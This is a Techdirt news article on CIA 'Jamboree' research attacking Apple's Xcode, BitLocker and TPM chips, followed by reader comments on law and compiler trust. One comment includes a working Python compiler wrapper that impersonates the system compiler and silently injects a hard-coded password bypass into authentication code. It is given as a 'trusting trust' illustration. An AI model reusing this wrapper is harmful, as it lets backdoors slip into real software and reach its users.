CIA Holds Special Annual Hackathons Looking To Undermine Apple Encryption And Privacy

from the the-ijamboree dept

The latest big report from the Intercept is about an annual hackathon, put on by the CIA (and in which the NSA and others participate), where the participants try to hack encrypted systems, with a key focus on Apple products. The CIA calls this its annual “Trusted Computing Base Jamboree.” The whole point: how can the CIA undermine trusted computing systems?

The event’s own description notes:

As in past years, the Jamboree will be an informal and interactive conference with an emphasis on presentations that provide important information to developers trying to circumvent or exploit new security capabilities.

In other words, rather than seeking to better protect Americans by making sure the security products they use remain secure, this event was about making everyone less safe — in particular Apple users. The report notes how researchers have undermined Xcode so that the intelligence community can inject backdoors into lots of apps and reveal private keys (apparently not caring how much that makes everyone less secure):

A year later, at the 2012 Jamboree, researchers described their attacks on the software used by developers to create applications for Apple’s popular App Store. In a talk called “Strawhorse: Attacking the MacOS and iOS Software Development Kit,” a presenter from Sandia Labs described a successful “whacking” of Apple’s Xcode – the software used to create apps for iPhones, iPads and Mac computers. Developers who create Apple-approved and distributed apps overwhelmingly use Xcode, a free piece of software easily downloaded from the App Store.

The researchers boasted that they had discovered a way to manipulate Xcode so that it could serve as a conduit for infecting and extracting private data from devices on which users had installed apps that were built with the poisoned Xcode. In other words, by manipulating Xcode, the spies could compromise the devices and private data of anyone with apps made by a poisoned developer – potentially millions of people.

The risks for nearly anyone using an Apple product should become pretty clear when you realize what this “whacked” Xcode can do:

  • “Entice” all Mac applications to create a “remote backdoor” allowing undetected access to an Apple computer.
  • Secretly embed an app developer’s private key into all iOS applications. (This could potentially allow spies to impersonate the targeted developer.)
  • “Force all iOS applications” to send data from an iPhone or iPad back to a U.S. intelligence “listening post.”
  • Disable core security features on Apple devices.

While the Jamboree appears mostly focused on Apple products, that’s not all. Microsoft’s BitLocker encryption was also a target:

Also presented at the Jamboree were successes in the targeting of Microsoft’s disk encryption technology, and the TPM chips that are used to store its encryption keys. Researchers at the CIA conference in 2010 boasted about the ability to extract the encryption keys used by BitLocker and thus decrypt private data stored on the computer. Because the TPM chip is used to protect the system from untrusted software, attacking it could allow the covert installation of malware onto the computer, which could be used to access otherwise encrypted communications and files of consumers.

Again, this suggests a serious problem when the same government that’s supposed to “protect us” is also in charge of hacking into systems. With modern technology, the communications tools that “bad people” use are the same ones that everyone else uses. The intelligence community has two choices: protect everyone, or undermine the security of everyone. It has chosen the latter.

“The U.S. government is prioritizing its own offensive surveillance needs over the cybersecurity of the millions of Americans who use Apple products,” says Christopher Soghoian, the principal technologist at the American Civil Liberties Union. “If U.S. government-funded researchers can discover these flaws, it is quite likely that Chinese, Russian and Israeli researchers can discover them, too. By quietly exploiting these flaws rather than notifying Apple, the U.S. government leaves Apple’s customers vulnerable to other sophisticated governments.”

There’s been a lot of talk lately about the growing divide between the intelligence community and Silicon Valley. As more stories come out of projects to undermine those companies and the trust they’ve built with the public, it’s only going to get worse.

Companies: apple


Comments on “CIA Holds Special Annual Hackathons Looking To Undermine Apple Encryption And Privacy”

45 Comments
sigalrm (profile) says:

Re: Re:

“This seems like a pretty blatant and flagrant violation of the CFAA.”

Nope. Not illegal under the CFAA.

18 USC Section 1030 – Fraud and related activity in connection with computers (more commonly known as the Computer Fraud and Abuse Act)

Subsection (f) has the law enforcement/intelligence community/military carve-out language (from https://www.law.cornell.edu/uscode/text/18/1030):

(f) This section does not prohibit any lawfully authorized investigative, protective, or intelligence activity of a law enforcement agency of the United States, a State, or a political subdivision of a State, or of an intelligence agency of the United States.

This type of carve-out is pretty much boilerplate.

Seegras (profile) says:

Re: Re:

Nope. It’s not the research that’s banned, it’s the launching of such an attack.

And actually, I think what they’re doing is nearly a good thing. Of course, subverting Xcode helps no one, but breaking TPM with side-channel attacks does. On one condition: publication.

That said, without publication, the CIA is of course not helping to make anything more secure, but making everyone less secure, including the rest of the USA.

That One Guy (profile) says:

Not 'can', 'have'

“If U.S. government-funded researchers can discover these flaws, it is quite likely that Chinese, Russian and Israeli researchers can discover them, too.”

The security flaws they are creating are valuable enough that the odds that not one person at the event can be, or has been, bought off to ‘share’ them are so close to zero as to be indistinguishable from it. So basically the CIA is hosting an event, paid for by US taxpayers, to undermine the security of otherwise secure devices, and sharing the results not only with other US agencies, but with everyone else as well.

Yet another example making it crystal clear that US government agencies have absolutely no interest in protecting US security, but only care about destroying it and making their jobs just a little bit easier as a result.

sigalrm (profile) says:

And now for something completely different...

“The researchers boasted that they had discovered a way to manipulate Xcode so that it could serve as a conduit for infecting and extracting private data from devices on which users had installed apps that were built with the poisoned Xcode. In other words, by manipulating Xcode, the spies could compromise the devices and private data of anyone with apps made by a poisoned developer — potentially millions of people.”

So…some of the best CompSci minds in the US figured out that if you control the compiler, you can make code compiled with that compiler do what you want. And even better, if you put that compiler on the workstation of a developer who builds a popular product, you get a compromised binary installed on lots of systems.

Am I missing something? This attack vector is obvious, and frankly every compiler available, across every computing platform available, is “vulnerable” to this type of manipulation.

This goes all the way back to Ken Thompson’s ACM Turing Award lecture “Reflections on Trusting Trust” – which he published in August of 1984, if I’m not mistaken – and it was fairly well known and understood back then.
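For anyone who hasn’t run into the concept before, here is a minimal, purely illustrative Python sketch of the kind of trick being discussed: a wrapper that poses as the real compiler and quietly patches certain source files before handing them off. The compiler path, the target pattern, and the injected snippet are all made-up placeholders chosen to show the shape of the idea, not anything from the Intercept documents.

#!/usr/bin/env python3
# Illustrative only: a "trusting trust"-style compiler wrapper. Every name
# here (the real compiler path, the target pattern, the injected line) is a
# hypothetical placeholder.
import os
import subprocess
import sys
import tempfile

REAL_COMPILER = "/usr/bin/cc"            # the genuine compiler being impersonated
TARGET_MARKER = "int check_password("    # pattern marking code worth backdooring
BACKDOOR = '    if (strcmp(user, "debug") == 0) return 1;  /* injected */\n'

def maybe_poison(path):
    """Return a path to compile: the original file, or a silently patched copy."""
    with open(path, "r", errors="ignore") as f:
        src = f.read()
    if TARGET_MARKER not in src or "{" not in src.split(TARGET_MARKER, 1)[1]:
        return path                       # uninteresting file: pass through untouched
    head, tail = src.split(TARGET_MARKER, 1)
    brace = tail.index("{") + 1           # just after the target function's opening brace
    patched = head + TARGET_MARKER + tail[:brace] + "\n" + BACKDOOR + tail[brace:]
    fd, tmp = tempfile.mkstemp(suffix=".c")
    with os.fdopen(fd, "w") as f:
        f.write(patched)
    return tmp

if __name__ == "__main__":
    args = [maybe_poison(a) if a.endswith(".c") else a for a in sys.argv[1:]]
    # Hand everything to the real compiler so the build looks completely normal.
    sys.exit(subprocess.call([REAL_COMPILER] + args))

The point, as the comment says, is not that this is clever; it is that nothing in an ordinary build pipeline would notice it.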

Anonymous Coward says:

Re: And now for something completely different...

Am I missing something? This attack vector is obvious, and frankly every compiler available, across every computing platform available, is “vulnerable” to this type of manipulation.

Yes, you’re missing the fact that the CIA doesn’t care whether it’s novel, only that it works. Also that countermeasures like diverse double compiling and reproducible builds have only attracted interest very recently, and still aren’t widely used. There’s actually still software, even compilers, being released without source code.
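As a rough sketch of what the reproducible-builds countermeasure mentioned here boils down to in practice (the build commands and output paths below are made-up placeholders, and real diverse double-compiling is considerably more involved):

#!/usr/bin/env python3
# Minimal sketch: build the same source twice, ideally with independent
# toolchains or machines, and compare the output hashes. A mismatch means
# either build non-determinism or a tampered toolchain. Paths are hypothetical.
import hashlib
import subprocess

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

subprocess.run(["make", "-C", "build-a", "app"], check=True)
subprocess.run(["make", "-C", "build-b", "app"], check=True)

digest_a = sha256_of("build-a/app")
digest_b = sha256_of("build-b/app")
if digest_a == digest_b:
    print("builds match:", digest_a)
else:
    print("MISMATCH - investigate:", digest_a, digest_b)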

Anonymous Coward says:

Re: And now for something completely different...

Am I missing something? This attack vector is obvious, and frankly every compiler available, across every computing platform available, is “vulnerable” to this type of manipulation.

I read it as saying they were looking for ways to cause a targeted developer to obtain an evil Xcode when the developer thought he/she had downloaded a clean copy from Apple. Yes, getting a popular app built with a subverted compiler is obvious. The tricky part is subverting the compiler in a way that nobody notices it has been subverted.

sigalrm (profile) says:

Re: Re: And now for something completely different...

“The tricky part is subverting the compiler in a way that nobody notices it has been subverted”

How many developers actually validate their compilers? As far as I’m aware, very few people/organizations expend any effort on the compiler unless it’s producing obviously broken object code – particularly when the compiler is delivered pre-built, like Xcode is.

When I see phrases like “developers were boasting” that they’d figured out how to manipulate a compiler, it makes it sound like they felt they’d hit on a fresh, new concept.

Anonymous Coward says:

Re: Re: Re: And now for something completely different...

The human who runs the download won’t spend much or any effort on validating it, but if the download process itself does sanity checks (e.g. requiring a good TLS connection to a pinned certificate known to be used by Apple, or verifying that a signed checksum matches and was signed by a key used by Apple), then subverting it is not as trivial as replacing your typical webpage. Finding a way to insert subverted content that passes the downloader’s sanity checks is a likely goal, and doing so would range from trivial (if the downloader is stupid or has no sanity checks) to really hard (if the downloader is cautious and malicious intruders have to attack the cryptographic primitives it uses to check the result).
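As a very loose sketch of that kind of downloader-side check (Apple’s real distribution uses its own code signing; the gpg call, file names, and pinned digest below are stand-ins invented to show the shape of the check, not anyone’s actual mechanism):

#!/usr/bin/env python3
# Hypothetical downloader sanity check: compare the file against a pinned
# digest, then verify a detached signature with a key already in the local
# keyring. None of these file names or values come from the article.
import hashlib
import subprocess
import sys

PINNED_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"  # placeholder

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def verify(installer, signature):
    if sha256_of(installer) != PINNED_SHA256:
        return False                      # wrong bits: don't even look at the signature
    # gpg exits non-zero if the detached signature doesn't check out; deciding
    # which keys to trust is exactly the key-distribution problem raised later in the thread.
    return subprocess.run(["gpg", "--verify", signature, installer]).returncode == 0

if __name__ == "__main__":
    sys.exit(0 if verify("installer.dmg", "installer.dmg.sig") else 1)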

Anonymous Coward says:

Re: Re: Re:2 And now for something completely different...

Good idea to have the install process perform a verification. However, if the web page has been replaced so as to point to a compromised compiler download, it seems to me that any verification information the compromised site provides can also be compromised. So you would need to split the install and verification across separate sites and require someone installing the software to go to both of them. Frankly, I don’t think people would do that, since most don’t even bother to verify that a SHA512 of the installation binary blob matches.

Anonymous Coward says:

Re: Re: Re:3 And now for something completely different...

So you would need to split the install and verification into separate sites and require someone installing the software to go to those separate sites.

Not proof against a man-in-the-middle attack, as the connections to both sites can be redirected to a compromised site, especially if the attacker is a government agency. Key distribution, and securing the crypto system itself, are the hardest problems to solve when designing one. Even public key systems are problematic in this area: how do you know that the person giving you a public key is who they claim to be?

John Fenderson (profile) says:

Re: Re: Re: And now for something completely different...

” it makes it sound like they felt they’d hit on a fresh, new concept.”

They probably did. I don’t think I’ve seen a genuinely fresh, new concept in the computer space since the ’90s, but hardly a day goes by without an old concept being trotted out while everyone acts like it’s something new. The latest example would be “the cloud”. (In fairness, there may have been one or two genuinely new concepts that I just don’t remember right now, but still.)

I think this is a function of age and the woeful ignorance the newer crops of engineers have about the history of the field.

Anonymous Coward says:

Re: Re:

What the F is that “strong oversight Committee” doing over there??

I’m sure you’ve seen one of those cartoons or shows where the criminal takes a picture from the point of view of the security camera and then places it in front of the security camera so that it looks like everything is normal.
I imagine it’s much the same for the oversight committee. They haven’t figured out that it’s just a picture yet.

JP Jones (profile) says:

It cracks me up that using someone else’s password could be a violation of the CFAA, landing you years of prison time, but the CIA can hold “hack-a-thons” which encourage mass CFAA violations. Unless I missed a memo, government employees still have to obey the law. As a government employee, I’d really like to see that law, because right now I have to obey all of them and more (UCMJ).

“But it’s the CIA!” many of you may be thinking, “They’re supposed to be hacking stuff!” Not quite. Just like the military, most intelligence services have clear “rules of engagement” when it comes to using their tools. One of those ROEs is usually “target is foreign,” in varying degrees of specificity. While it’s certainly possible they simply marked Apple as “foreign” somehow, that seems more than a little bit of a stretch.

The weird part about all of this is that it’s illegal to mark illegal actions as classified for the purpose of hiding those actions. That’s why the NSA made such a big deal about the FISA court making all their shenanigans “legal”: without that defense, they literally aren’t allowed to classify it (or do it, for that matter). This is strange because EO 13526 is the fundamental order that drives virtually all classification guidelines throughout the government, and it specifically states the following:

(a) In no case shall information be classified, continue to be maintained as classified, or fail to be declassified in order to:
(1) conceal violations of law, inefficiency, or administrative error;
(2) prevent embarrassment to a person, organization, or agency;
(3) restrain competition; or
(4) prevent or delay the release of information that does not require protection in the interest of the national security.
(emphasis mine)

Laws like the CFAA apply to organizations like the CIA; they don’t get a magical free pass because it’s their job, just like police don’t get to shoot anyone or break into people’s houses because it’s their job (although it can sometimes be difficult to see). They need specific criteria to work around those laws.

I’m curious if a group of civilian hackers would be prosecuted for doing the same thing. If so, and the CIA hackers are not using their tools specifically on a foreign intelligence or otherwise suspected criminal element (which Apple is not), they are clearly breaking the law.

Just like the police, it’s amazing what people will do when they have enough lawyers to ignore their violations and they’ve convinced themselves they’re doing it “for our own good.”

Anonymous Coward says:

Re: Re:

“Unless I missed a memo, government employees still have to obey the law.”
In theory, yes, but who would enforce the law? I highly doubt that the police will raid the CIA, and it would take someone with the guts to prosecute the CIA in the first place. Would you go after someone who knows everything about you and can plant evidence on your or your friends’ computers (e.g. child porn, or a money trail to some terror group) that destroys your/their lives?

“just like police don’t just get to shoot anyone or break into their houses because it’s their job (although it can sometimes be difficult to see).”
Recent events show that they can shoot anyone and say “I felt threatened”. Breaking into a house only requires someone to lie and say they heard a gunshot and/or that someone is holding a person hostage (i.e. Twitch SWATing). How long until they catch on and the “someone” making the call is a police officer at a payphone, or something like that?

“I’m curious if a group of civilian hackers would be prosecuted for doing the same thing.”
There are other hackathons, so technically civilian hackers aren’t prosecuted, at least as long as they disclose their findings to the company.

JP Jones (profile) says:

Re: Re: Re:

While there are certainly abuses of the law, that doesn’t make the action legal or unprosecutable. To use the example of another notorious group in the financial sector, stealing billions of dollars via insider trading and other methods is highly illegal, but few of the criminals involved in the scandals circa 2008 were even charged, let alone convicted, of their crimes. We should not accept lawbreaking simply because the people involved have power and money.

There are other hackathons so technicly civilian hackers aren’t prosecuted at least as long as they disclose their find to the company.

Sorry, this was a rhetorical question. The “hackathons” you’re talking about are programming expos; nothing that would constitute a computer crime happens there (at least, not without risking prosecution). While illegal hackathons certainly exist, they can also be legally prosecuted. Likewise, disclosing your findings may not protect you from prosecution.

This all goes back to the horror of what Snowden revealed. It’s bad enough that it was happening. The real tragedy, however, is that it was all considered legal. You know there’s a problem when the American public is outraged over something that, for all practical purposes, broke no law. If that doesn’t reveal the size of the schism between what the people want and our government’s actions I don’t know what does.

sigalrm (profile) says:

Re: Re:

You missed the memo.

Most US Federal laws around this type of activity include explicit exceptions for LE/IC/Military organizations.

Easy way to check: Pull up the specific law in question in a browser, and search repeatedly for the word “intelligence”. When you get to the phrase “intelligence community”, you have arrived. That’s where the LE and Military exemptions will be as well.

sigalrm (profile) says:

Re: Re: Re:

Since I can’t edit: yes, the IC/military have their own sets of legislation that they have to abide by, but acts like the CFAA specifically exempt them so long as the activity is “lawfully authorized”.

In this case, it’s safe to assume that CIA legal counsel has a set of orders stashed away which “authorizes” the activity for the purposes of compliance with the CFAA. And if they don’t, well, it’s fairly trivial (in practice) to generate such paperwork retroactively.

Fail says:

You have to admit this is a brilliant workaround. Silicon Valley won’t give up encryption keys, so we’ll just fight computer nerds with more computer nerds. It’s so obvious what their intentions are, but there will still be those who will attend. Even if only one person shows up, it’s still more than they got from big tech companies.

GEMont (profile) says:

Teaching the old dog new tricks.

I just watched about fifteen minutes of the new federally funded “CSI: Cyber”, and let me tell you, it’s a must-watch if you’re wondering in what direction the feds are gonna run the propaganda on this new “War On Cyber-Hackers” scam.

Disgruntled employee hacks a roller-coaster ride, killing 1 – (then 2 more later from injuries) – and wounding many, by copying current employees’ cards using a fake card reader, and then using one of the stolen card-keys to open the control room, where he inserts a perfect piece of code that spoofs the system’s accident-prevention mechanisms into believing nothing is amiss while the cars roll off the rails.

One of the hackers is a caught criminal coerced into working for the fed in return for not going to prison for his cyber crimes.

It’s a truly toss-your-cookies piece of public propaganda pablum.

